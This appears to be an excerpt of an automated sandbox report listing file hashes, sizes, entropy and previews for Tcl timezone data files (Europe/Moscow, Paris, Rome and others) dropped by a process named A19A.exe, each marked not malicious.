                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cYedmnClAHEFFkebUe9OtUe9h7+UeGH3UeRUeIuUeKqCbUeaJJUevTkUetUeibEV:kmnAA4F7wxJ2JoJrprXn1CL9yLI0vjls
                                                                                                                                                                                                                                                                                                                                MD5:AB2CB4A38196852883272148B4A14085
                                                                                                                                                                                                                                                                                                                                SHA1:ED22233A615B775DB528053807858A0B69E9D4FB
                                                                                                                                                                                                                                                                                                                                SHA-256:D9814005CB99F2275A4356A8B226E16C7C823ADC940F3A7BBB909D4C01BF44E3
                                                                                                                                                                                                                                                                                                                                SHA-512:F2179FC1C15954FD7F7B824C5310183C96EDC630880E1C8C85DF4423ECC5994B8A9CA826745CC8BCA77945A36BCADAA87620C31FFBD40071438695A610EBF045
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Moscow) {. {-9223372036854775808 9017 0 LMT}. {-2840149817 9017 0 MMT}. {-1688265017 9079 0 MMT}. {-1656819079 12679 1 MST}. {-1641353479 9079 0 MMT}. {-1627965079 16279 1 MDST}. {-1618716679 12679 1 MST}. {-1596429079 16279 1 MDST}. {-1593820800 14400 0 MSD}. {-1589860800 10800 0 MSK}. {-1542427200 14400 1 MSD}. {-1539493200 18000 1 +05}. {-1525323600 14400 1 MSD}. {-1491188400 7200 0 EET}. {-1247536800 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):174
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.73570159193188
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq85GKLWVAIgNwMGKLG6yQatHefeWFKYGKL1:SlSWB9IZaM3yZdLWVAIgGMdL9y3HefeW
                                                                                                                                                                                                                                                                                                                                MD5:47C275C076A278CA8E1FF24E9E46CC22
                                                                                                                                                                                                                                                                                                                                SHA1:55992974C353552467C2B57E3955E4DD86BBFAD2
                                                                                                                                                                                                                                                                                                                                SHA-256:34B61E78EF15EA98C056C1AC8C6F1FA0AE87BD6BC85C58BE8DA44D017B2CA387
                                                                                                                                                                                                                                                                                                                                SHA-512:1F74FC0B452C0BE35360D1C9EC8347063E8480CA37BE893FD4FF7FC2279B7D0C0909A26763C7755DFB19BE9736340D3FB00D39E9F6BF23C1D2F0015372139847
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Nicosia)]} {. LoadTimeZoneFile Asia/Nicosia.}.set TZData(:Europe/Nicosia) $TZData(:Asia/Nicosia).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7651
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7309855254369766
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:aG6sT+cQJWxdocRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQt:abcQJWxd/RNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:2A3F771DD9EAE2E9C1D8394C12C0ED71
                                                                                                                                                                                                                                                                                                                                SHA1:541DCF144EFFE2DFF27B81A50D245C7385CC0871
                                                                                                                                                                                                                                                                                                                                SHA-256:8DDFB0296622E0BFDBEF4D0C2B4EA2522DE26A16D05340DFECA320C0E7B2B1F7
                                                                                                                                                                                                                                                                                                                                SHA-512:E1526BD21E379F8B2285481E3E12C1CF775AE43E205D3E7E4A1906B87821D5E15B101B24463A055B6013879CD2777112C7F27B5C5220F280E3C48240367AA663
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Oslo) {. {-9223372036854775808 2580 0 LMT}. {-2366757780 3600 0 CET}. {-1691884800 7200 1 CEST}. {-1680573600 3600 0 CET}. {-927511200 7200 0 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 0 CEST}. {-765327600 3600 0 CET}. {-340844400 7200 1 CEST}. {-324514800 3600 0 CET}. {-308790000 7200 1 CEST}. {-293065200 3600 0 CET}. {-277340400 7200 1 CEST}. {-261615600 3600 0 CET}. {-245890800 7200 1 CEST}. {-230166000 3600 0 CET}. {-214441200 7200 1 CEST}. {-198716400 3600 0 CET}. {-182991600 7200 1 CEST}. {-166662000 3600 0 CET}. {-147913200 7200 1 CEST}. {-135212400 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {40185
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8838
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7637328221887567
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:1XV8tXttpD724lvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIu:1FYtPSTRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:153CA0EF3813D91C5E23B34ADFE7A318
                                                                                                                                                                                                                                                                                                                                SHA1:F7F18CB34424A9B62172F00374853F1D4A89BEE4
                                                                                                                                                                                                                                                                                                                                SHA-256:092BF010A1CF3819B102C2A70340F4D67C87BE2E6A8154716241012B5DFABD88
                                                                                                                                                                                                                                                                                                                                SHA-512:E2D418D43D9DFD169238DDB0E790714D3B88D16398FA041A9646CB35F24EF79EE48DA4B6201E6A598E89D4C651F8A2FB9FB874B2010A51B3CD35A86767BAF4D2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Paris) {. {-9223372036854775808 561 0 LMT}. {-2486678901 561 0 PMT}. {-1855958901 0 0 WET}. {-1689814800 3600 1 WEST}. {-1680397200 0 0 WET}. {-1665363600 3600 1 WEST}. {-1648342800 0 0 WET}. {-1635123600 3600 1 WEST}. {-1616893200 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585443600 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552266000 0 0 WET}. {-1539997200 3600 1 WEST}. {-1520557200 0 0 WET}. {-1507510800 3600 1 WEST}. {-1490576400 0 0 WET}. {-1470618000 3600 1 WEST}. {-1459126800 0 0 WET}. {-1444006800 3600 1 WEST}. {-1427677200 0 0 WET}. {-1411952400 3600 1 WEST}. {-1396227600 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301274000 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269824400 0 0 WET}. {-1253494800 3600 1 WEST}. {-1238374800 0 0 W
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):185
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.86256001696314
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV/sUE2tvFVAIgoq8sUE2vqLyQazKIGl1/yQahsUE2u:SlSWB9IZaM3ymhrE2tvFVAIgohrE2vq7
                                                                                                                                                                                                                                                                                                                                MD5:4F430ECF91032E40457F2D2734887860
                                                                                                                                                                                                                                                                                                                                SHA1:D1C099523C34ED0BD48C24A511377B232548591D
                                                                                                                                                                                                                                                                                                                                SHA-256:F5AB2E253CA0AB7A9C905B720B19F713469877DE1874D5AF81A8F3E74BA17FC8
                                                                                                                                                                                                                                                                                                                                SHA-512:2E6E73076A18F1C6C8E89949899F81F232AE66FEB8FFA2A5CE5447FFF581A0D5E0E88DABEAA3C858CC5544C2AE9C6717E590E846CBFD58CEF3B7558F677334FB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Podgorica) $TZData(:Europe/Belgrade).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7763
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7367850410615597
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:3Nt6F3oxSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUE:3/xSTRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:D04290286789AB05490A7DE8569D80AB
                                                                                                                                                                                                                                                                                                                                SHA1:B65938E29CBFB65D253E041EE1CD92FE75C3C663
                                                                                                                                                                                                                                                                                                                                SHA-256:60494447C38C67E8173D4A9CDBA8D16AF90545FA83F3558DB8C9B7D0D052DD45
                                                                                                                                                                                                                                                                                                                                SHA-512:B0897CD4785D737B7C5E5CE717B55AEE8689F83105DDB8A0DA2B4977961124AFA5AF573D57AA4467E5DB68FC5F927D7B58AEE7280238392C5666CC090476EC91
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Prague) {. {-9223372036854775808 3464 0 LMT}. {-3786829064 3464 0 PMT}. {-2469401864 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 1 CEST}. {-777862800 7200 0 CEST}. {-765327600 3600 0 CET}. {-746578800 7200 1 CEST}. {-733359600 3600 0 CET}. {-728517600 0 1 GMT}. {-721260000 0 0 CET}. {-716425200 7200 1 CEST}. {-701910000 3600 0 CET}. {-684975600 7200 1 CEST}. {-670460400 3600 0 CET}. {-654217200 7200 1 CEST}. {-639010800 3600 0 CET}. {283993200 3600 0 CET}. {291776400 7200 1 CEST}. {307501200 3600 0 CET}. {323830800 7200 1 CEST}. {338
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7400
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.686652767751974
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:A46YyurGXl6V/jfaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtk:AnGG160h2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                                                                                                MD5:5F71EBD41FC26CA6FAA0A26CE83FA618
                                                                                                                                                                                                                                                                                                                                SHA1:0FC66EEB374A2930A7F6E2BB5B7D6C4FD00A258C
                                                                                                                                                                                                                                                                                                                                SHA-256:6F63E58F355EF6C4CF8F954E01544B0E152605A72B400C731E3100B422A567D0
                                                                                                                                                                                                                                                                                                                                SHA-512:20B730949A4967C49D259D4D00D8020579580F7FAA0278FBCEBDF8A8173BBF63846DDBF26FFFBBADB0FAF3FD0EB427DBB8CF18A4A80F7B023D2027CC952A773F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Riga) {. {-9223372036854775808 5794 0 LMT}. {-2840146594 5794 0 RMT}. {-1632008194 9394 1 LST}. {-1618702594 5794 0 RMT}. {-1601681794 9394 1 LST}. {-1597275394 5794 0 RMT}. {-1377308194 7200 0 EET}. {-928029600 10800 0 MSK}. {-899521200 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-795834000 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 10800 1 EEST}. {622598
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8511
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.729257183076779
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:YnZKupNc6XTWycRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQt:YVhiRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:3E209874EA8830B8436F897B0B7682B1
                                                                                                                                                                                                                                                                                                                                SHA1:FC9AB2212C10C25850ACE69DC3BE125FD0912092
                                                                                                                                                                                                                                                                                                                                SHA-256:626E7F8389382108E323B8447416BAC420A29442D852817024A39A97D556F365
                                                                                                                                                                                                                                                                                                                                SHA-512:24C1A7890E076C4D58426D62726BC21FA6F70F16B5E9797405B7404AACB1CB2FC283483018418EF0CEE43720838864E01427C60269D98866A48F35CAF0483EFA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Rome) {. {-9223372036854775808 2996 0 LMT}. {-3259097396 2996 0 RMT}. {-2403565200 3600 0 CET}. {-1690765200 7200 1 CEST}. {-1680487200 3600 0 CET}. {-1664758800 7200 1 CEST}. {-1648951200 3600 0 CET}. {-1635123600 7200 1 CEST}. {-1616896800 3600 0 CET}. {-1604278800 7200 1 CEST}. {-1585533600 3600 0 CET}. {-1571014800 7200 1 CEST}. {-1555293600 3600 0 CET}. {-932432400 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-830307600 7200 0 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-807152400 7200 0 CEST}. {-798073200 3600 0 CET}. {-781052400 7200 1 CEST}. {-766717200 3600 0 CET}. {-750898800 7200 1 CEST}. {-733359600 3600 0 CET}. {-719456400 7200 1 CEST}. {-701917200 3600 0 CET}. {-689209200 7200 1 CEST}. {-670460400 3600 0 CET}. {-114051600 7200 1 CEST}. {-103168800 3600 0 CET}. {-81997200 7200 1 C
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2045
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5710319343050183
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cBesqgOjS+OVkb/cXODnOwUDOS5u8OimFeb/ROHc9qOYNkw/O2blbEUhtCUHiWnb:rdDTZVemFLN7NBx3BngyxJvqJ2FJ/jz
                                                                                                                                                                                                                                                                                                                                MD5:30271DF851CE290256FA0BE793F3A918
                                                                                                                                                                                                                                                                                                                                SHA1:307BF37BD5110537B023A648AAC41F86E3D34ACB
                                                                                                                                                                                                                                                                                                                                SHA-256:11400A62327FB9DEFB2D16EBD8E759F94C37EF4F12C49AC97DA2E5031FFA0079
                                                                                                                                                                                                                                                                                                                                SHA-512:3E86BDF258BA23AFF9E1BDCDFE7853D5413A589160F67AF7424CE014B7A77A948B8BF973EB02A0FFFE47D5D0EA4464D851DF294C04AF685C0AF7A0EB08DD9067
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Samara) {. {-9223372036854775808 12020 0 LMT}. {-1593820800 10800 0 +03}. {-1247540400 14400 0 +04}. {-1102305600 14400 0 +05}. {354916800 18000 1 +05}. {370724400 14400 0 +04}. {386452800 18000 1 +05}. {402260400 14400 0 +04}. {417988800 18000 1 +05}. {433796400 14400 0 +04}. {449611200 18000 1 +05}. {465343200 14400 0 +04}. {481068000 18000 1 +05}. {496792800 14400 0 +04}. {512517600 18000 1 +05}. {528242400 14400 0 +04}. {543967200 18000 1 +05}. {559692000 14400 0 +04}. {575416800 18000 1 +05}. {591141600 14400 0 +04}. {606866400 10800 0 +04}. {606870000 14400 1 +04}. {622594800 10800 0 +03}. {638319600 14400 1 +04}. {654649200 10800 0 +03}. {670374000 7200 0 +03}. {670377600 10800 1 +03}. {686102400 10800 0 +03}. {687916800 14400 0 +04}. {701820000 18000 1 +05}. {717544800 14400 0 +04}. {733269600 18000 1 +05}. {748994400
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):174
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.908962717024613
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVvjFwFVAIgoqsuCHRLyQawELDX7x/yQax9:SlSWB9IZaM3ymx5wFVAIgoxuCxLyt/yR
                                                                                                                                                                                                                                                                                                                                MD5:C50388AD7194924572FA470761DD09C7
                                                                                                                                                                                                                                                                                                                                SHA1:EF0A2223B06BE12EFE55EE72BF2C941B7BFB2FFE
                                                                                                                                                                                                                                                                                                                                SHA-256:7F89757BAE3C7AE59200DCEEEE5C38A7F74EBAA4AA949F54AFD5E9BB64B13123
                                                                                                                                                                                                                                                                                                                                SHA-512:0CE5FF2F839CD64A2C9A5AE6BBE122C91342AE44BDECDB9A3BA9F08578BC0B474BC0AF0E773868B273423289254909A38902B225A0092D048AC44BCF883AB4B0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Rome)]} {. LoadTimeZoneFile Europe/Rome.}.set TZData(:Europe/San_Marino) $TZData(:Europe/Rome).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):184
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.890934294125181
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV/sUE2tvFVAIgoq8sUE2vqLyQawEX3GEaQahsUE2u:SlSWB9IZaM3ymhrE2tvFVAIgohrE2vqa
                                                                                                                                                                                                                                                                                                                                MD5:5C12CEEDB17515260E2E143FB8F867F5
                                                                                                                                                                                                                                                                                                                                SHA1:51B9CDF922BFBA52BF2618B63435EC510DEAE423
                                                                                                                                                                                                                                                                                                                                SHA-256:7C45DFD5F016982F01589FD2D1BAF97898D5716951A4E08C3540A76E8D56CEB1
                                                                                                                                                                                                                                                                                                                                SHA-512:7A6B7FDFD6E5CFEB2D1AC136922304B0A65362E19307E0F1E20DBF48BED95A262FAC9CBCDB015C3C744D57118A85BD47A57636A05144430BF6707404F8E53E8C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Sarajevo) $TZData(:Europe/Belgrade).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1990
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5705804674707893
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cWe35gjS+OVkb/cXODnOwUDOS5u8OimFeb/ROHc9qOYNkwLUk+EUhtCUH9mUBU9R:qWDTZVemFLN70333+ix6b0JiGk
                                                                                                                                                                                                                                                                                                                                MD5:EEA55E1788265CCC7B3BDB775AF3DD38
                                                                                                                                                                                                                                                                                                                                SHA1:E327A5965114AB8BF6E479989E43786F0B74CFB1
                                                                                                                                                                                                                                                                                                                                SHA-256:0031D4DEC64866DEB1B5E566BB957F2C0E46E5751B31DF9C8A3DA1912AEC4CB2
                                                                                                                                                                                                                                                                                                                                SHA-512:21EF7D364814259F23319D4BC0E4F7F0653D35C1DD03D22ACD8E9A540EE8A9E651BEE22501E4150F6C74901AC2ED750CE08AAE0551DF5A44AB11FD4A3DB49D59
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Saratov) {. {-9223372036854775808 11058 0 LMT}. {-1593820800 10800 0 +03}. {-1247540400 14400 0 +05}. {354916800 18000 1 +05}. {370724400 14400 0 +04}. {386452800 18000 1 +05}. {402260400 14400 0 +04}. {417988800 18000 1 +05}. {433796400 14400 0 +04}. {449611200 18000 1 +05}. {465343200 14400 0 +04}. {481068000 18000 1 +05}. {496792800 14400 0 +04}. {512517600 18000 1 +05}. {528242400 14400 0 +04}. {543967200 18000 1 +05}. {559692000 14400 0 +04}. {575416800 10800 0 +04}. {575420400 14400 1 +04}. {591145200 10800 0 +03}. {606870000 14400 1 +04}. {622594800 10800 0 +03}. {638319600 14400 1 +04}. {654649200 10800 0 +03}. {670374000 14400 0 +04}. {701820000 10800 0 +04}. {701823600 14400 1 +04}. {717548400 10800 0 +03}. {733273200 14400 1 +04}. {748998000 10800 0 +03}. {764722800 14400 1 +04}. {780447600 10800 0 +03}. {796172400
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2307
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8673720237532523
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:wMxjIJJ2JoJrsyCmh7VloiIa0QM0ScfSblniT+CC:jjInyur/hUaKln
                                                                                                                                                                                                                                                                                                                                MD5:F745F2F2FDEA14C70EA27BA35D4E3051
                                                                                                                                                                                                                                                                                                                                SHA1:C4F01A629E6BAFB31F722FA65DC92B36D4E61E43
                                                                                                                                                                                                                                                                                                                                SHA-256:EAE97716107B2BF4A14A08DD6197E0542B6EE27C3E12C726FC5BAEF16A144165
                                                                                                                                                                                                                                                                                                                                SHA-512:0E32BE79C2576943D3CB684C2E25EE3970BE7F490FF8FD41BD897249EA560F280933B26B3FBB841C67915A3427CB009A1BFC3DACD70C4F77E33664104E32033E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Simferopol) {. {-9223372036854775808 8184 0 LMT}. {-2840148984 8160 0 SMT}. {-1441160160 7200 0 EET}. {-1247536800 10800 0 MSK}. {-888894000 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-811645200 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {631141200 10800 0 MSK}. {646786800 7200 0 EET}. {694216800 7200 0 EET}. {701820000 10800 1 EEST}. {71754
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):182
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.906520812033373
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV/sUE2tvFVAIgoq8sUE2vqLyQawOgpr8QahsUE2u:SlSWB9IZaM3ymhrE2tvFVAIgohrE2vq3
                                                                                                                                                                                                                                                                                                                                MD5:BB062D4D5D6EA9BA172AC0555227A09C
                                                                                                                                                                                                                                                                                                                                SHA1:75CCA7F75CEB77BE5AFB02943917DB048051F396
                                                                                                                                                                                                                                                                                                                                SHA-256:51820E2C5938CEF89A6ED2114020BD32226EF92102645526352E1CB7995B7D0A
                                                                                                                                                                                                                                                                                                                                SHA-512:8C6AD79DD225C566D2D93606575A1BF8DECF091EDFEED1F10CB41C5464A6A9F1C15BEB4957D76BD1E03F5AE430319480A3FDACEF3116EA2AF0464427468BC855
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Skopje) $TZData(:Europe/Belgrade).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7396
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6373782291014924
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:8lAV/6vcBrYixX21/BVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykePG:8lAV/SEm1/mh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                                                                                                MD5:8B538BB68A7FF0EB541EB2716264BAD9
                                                                                                                                                                                                                                                                                                                                SHA1:49899F763786D4E7324CC5BAAECFEA87D5C4F6C7
                                                                                                                                                                                                                                                                                                                                SHA-256:9D60EF4DBA6D3802CDD25DC87E00413EC7F37777868C832A9E4963E8BCDB103C
                                                                                                                                                                                                                                                                                                                                SHA-512:AD8D75EE4A484050BB108577AE16E609358A9E4F31EA1649169B4A26C8348A502B4135FE3A282A2454799250C6EDF9E70B236BCF23E1F6540E123E39E81BBE41
                                                                                                                                                                                                                                                                                                                                Malicious:false
